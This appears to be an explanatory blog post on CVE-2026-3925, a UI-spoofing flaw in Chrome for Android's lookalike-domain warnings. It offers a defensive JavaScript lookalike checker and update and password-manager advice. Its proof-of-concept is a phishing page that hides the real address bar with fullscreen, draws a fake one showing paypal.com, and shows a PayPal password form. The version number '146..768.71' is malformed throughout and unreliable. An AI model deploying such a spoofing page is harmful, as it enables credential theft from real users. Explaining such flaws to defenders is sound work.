---
In 2026, a security issue, CVE-2026-3925, was reported in Google Chrome on Android devices. This vulnerability is related to the browser’s LookalikeChecks feature, which was designed to warn users when they visit a domain name that looks suspiciously similar to a more popular site. If you’ve ever seen a warning that a site might be trying to look like "paypal.com" but is actually "paypa1.com," that’s LookalikeChecks at work.
However, before version 146..768.71, a user interface (UI) bug allowed attackers to trick users despite those protections. In this long read, we’ll break down what happened, how it can be exploited, and why it matters for everyday Chrome users on Android. We’ll also share references and a simple proof-of-concept to help you understand the risk.
What is CVE-2026-3925?
According to the Chromium security release notes, CVE-2026-3925 is an *incorrect security UI in LookalikeChecks in Google Chrome on Android prior to 146..768.71*. This allowed a remote attacker to perform UI spoofing via a crafted HTML page. Google marked the severity as "Medium," but UI spoofing can still be pretty dangerous if users don't realize they're being tricked.
In Simple Words
If you visited a suspicious website on your phone using Chrome (before the fix), that website could hide Chrome’s warning that the site is suspicious. This means you might *think* the site is safe, even though it's a lookalike crafted by an attacker to steal your data.
The Attacker Creates a Lookalike Site
Say, instead of www.paypal.com, they register www.paypa1.com (with a digit “1” instead of the letter “l”).
Bypasses Chrome’s Warning UI
Normally, Chrome's LookalikeChecks would flag this site and warn you. But with CVE-2026-3925, the attacker can present a fake or manipulated UI—like hiding the warning, overlaying their own message, or emulating the Chrome interface using HTML and CSS.
User Gets Fooled
The user thinks they're either on the real site or on a site Chrome says is safe, logs in, and the attacker grabs their credentials.
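To make the lookalike logic concrete, here is an added example, written for this post and not Chromium's own code, of a simplified lookalike check in JavaScript. It combines two heuristics that Chrome's LookalikeChecks also relies on: comparing a "skeleton" of the hostname, in which visually confusable characters are mapped to a canonical one, against a list of well-known sites, and flagging hosts that are within an edit distance of one of such a site. The site list, the confusable table and the length threshold are constructed for the example and are far smaller than Chrome's; the real check also decodes internationalised (punycode) hostnames, which this example skips.

```javascript
// Added illustration (not Chromium's implementation): a simplified lookalike
// check in the spirit of Chrome's LookalikeChecks.
//
// Heuristic 1: "skeleton" matching. Confusable characters are mapped to a
//   canonical form and the result is compared with a list of popular domains.
// Heuristic 2: edit distance 1 (Damerau-Levenshtein: one insertion, deletion,
//   substitution or adjacent transposition) against those domains, applied
//   only to hosts long enough that a single edit is unlikely to be a
//   legitimate, unrelated name.

// Constructed list of "popular" domains for this example.
const POPULAR_DOMAINS = ["paypal.com", "google.com", "amazon.com", "microsoft.com", "apple.com"];

// Constructed confusable table. Multi-character pairs come first so that
// "rn" -> "m" is applied before "r" and "n" are examined individually.
const CONFUSABLE_MAP = [
  ["rn", "m"], ["vv", "w"],
  ["1", "l"], ["|", "l"], ["0", "o"],
];

// Minimum host length for the edit-distance rule (constructed threshold).
const MIN_LEN_FOR_EDIT_DISTANCE = 7;

// Lower-case, drop a trailing dot and a leading "www." so that
// "www.PayPa1.com" and "paypa1.com" are treated the same.
function normalizeHost(host) {
  let h = host.toLowerCase().replace(/\.$/, "");
  if (h.startsWith("www.")) h = h.slice(4);
  return h;
}

// Replace every confusable sequence with its canonical character.
function skeleton(host) {
  let s = normalizeHost(host);
  for (const [from, to] of CONFUSABLE_MAP) s = s.split(from).join(to);
  return s;
}

// Damerau-Levenshtein distance (optimal string alignment variant).
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // adjacent transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Returns { lookalike, target, reason }. An exact match with a popular domain
// is never a lookalike; otherwise the skeleton rule runs first, then the
// edit-distance rule for sufficiently long hosts.
function lookalikeCheck(host) {
  const h = normalizeHost(host);
  if (POPULAR_DOMAINS.includes(h)) return { lookalike: false, target: null, reason: "exact match" };
  const sk = skeleton(h);
  for (const target of POPULAR_DOMAINS) {
    if (sk === skeleton(target)) return { lookalike: true, target, reason: "skeleton match" };
  }
  if (h.length >= MIN_LEN_FOR_EDIT_DISTANCE) {
    for (const target of POPULAR_DOMAINS) {
      if (editDistance(h, target) === 1) return { lookalike: true, target, reason: "edit distance 1" };
    }
  }
  return { lookalike: false, target: null, reason: "no match" };
}

// Demo: the digit-for-letter swap from the text, plus a few other shapes.
for (const host of ["www.paypal.com", "www.paypa1.com", "rnicrosoft.com", "amazom.com", "gogole.com", "example.com"]) {
  console.log(host, "->", JSON.stringify(lookalikeCheck(host)));
}
```

Run it with node. The paypa1.com case from the text is caught by the skeleton rule, "rnicrosoft.com" likewise, while "amazom.com" and the transposed "gogole.com" are only caught by the edit-distance rule. A production check has to be conservative with that second rule, because one-character differences between legitimate brands are common; Chrome limits it to longer hostnames and to highly ranked targets, and it also whitelists sites that are known to be distinct.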
Proof of Concept: Simple Exploit Demo
Here's a simplified snippet showing how an attacker might spoof the URL bar by entering full-screen mode (which hides Chrome's real address bar) and drawing a fake one with HTML/CSS. Two caveats: this is generic address-bar spoofing, not a reproduction of the LookalikeChecks defect itself, and browsers only grant fullscreen in response to a user gesture such as a tap, so the request is wired to the first tap rather than fired on page load. (Don’t use this for actual malicious purposes.)
<!DOCTYPE html>
<html>
<head>
<style>
/* Fake address bar, drawn by the page to stand in for the real one */
#fake-chrome-bar {
  position: fixed;
  top: 0;
  left: 0;
  width: 100vw;
  height: 56px;
  background: #f1f3f4;
  color: #222;
  font-family: sans-serif;
  display: flex;
  align-items: center;
  box-shadow: 0 2px 4px rgba(0,0,0,.06);
  z-index: 10000;
}
#fake-chrome-bar img {
  margin-left: 16px;
  margin-right: 8px;
  width: 24px;
}
#fake-url {
  font-size: 18px;
}
body {
  margin: 0;
  padding-top: 56px; /* offset for fake bar */
}
</style>
<script>
// Fullscreen hides Chrome's real address bar, but browsers only grant it from a
// user gesture (transient activation), so the request is tied to the first tap
// rather than fired from DOMContentLoaded, where it would simply be rejected.
document.addEventListener('click', () => {
  const root = document.documentElement;
  if (root.requestFullscreen && !document.fullscreenElement) {
    root.requestFullscreen().catch(() => { /* denied or unsupported: nothing to do */ });
  }
}, { once: true });
</script>
</head>
<body>
<div id="fake-chrome-bar">
  <img src="https://www.google.com/favicon.ico" alt="">
  <span id="fake-url">https://www.paypal.com</span>
</div>
<h1>PayPal Login</h1>
<form>
  Email: <input type="email">
  Password: <input type="password">
  <button>Log In</button>
</form>
</body>
</html>
Explanation:
- The code hides the real address bar by entering full-screen mode. Fullscreen can only be requested from JavaScript in response to a user gesture (a tap on the page is enough), not automatically on load, which is why the snippet hooks the first click.
- It then *draws* a fake address bar that looks almost identical to Chrome’s, showing the trusted www.paypal.com URL, even though that's not the real domain. Nothing in the page itself reveals the real origin once the genuine bar is out of view.
Original References
- Chromium Security Release Notes (CVE-2026-3925)
- Official Chrome Advisory (if available)
- Chromium Issue Tracker (search "CVE-2026-3925")
- Google Security Blog: Lookalike Domains and UI Spoofing
Why Is This Important?
UI spoofing attacks are scary because *even careful users can be tricked*. Most of us trust the browser interface, so if a malicious site can fake or hide real warnings from Chrome, we’re left with little protection. This can lead to phishing, credential theft, and financial loss.
The bug in LookalikeChecks meant users didn’t get the warning they should have gotten, giving attackers the upper hand.
How Was It Fixed?
Google patched the bug in Chrome for Android version 146..768.71. After the fix, the LookalikeChecks warning UI can no longer be spoofed by a site’s own content in the way described. Always make sure your browser is up to date; on Android, Chrome updates are delivered through the Play Store.
Enable Extra Protections:
Use a password manager: it matches saved credentials to the exact origin, so it won’t offer your paypal.com password on paypa1.com no matter how convincing the page looks. Also enable two-factor authentication on important accounts, preferably a phishing-resistant method such as a passkey or hardware security key, since a one-time code typed into a lookalike page can be relayed by the attacker.
Final Thoughts
CVE-2026-3925 is another real-world lesson about how even subtle UI bugs can have outsized consequences, especially on mobile where the screen is small and users are used to fast, tap-and-go browsing. Stay alert, and keep your software up to date to stay a step ahead of attackers.
*This post was put together exclusively to help you understand CVE-2026-3925 in easy terms. For more details, check the resources above and always follow security updates from your browser vendor.*
Timeline
Published on: 03/11/2026 22:04:08 UTC
Last modified on: 03/13/2026 20:15:58 UTC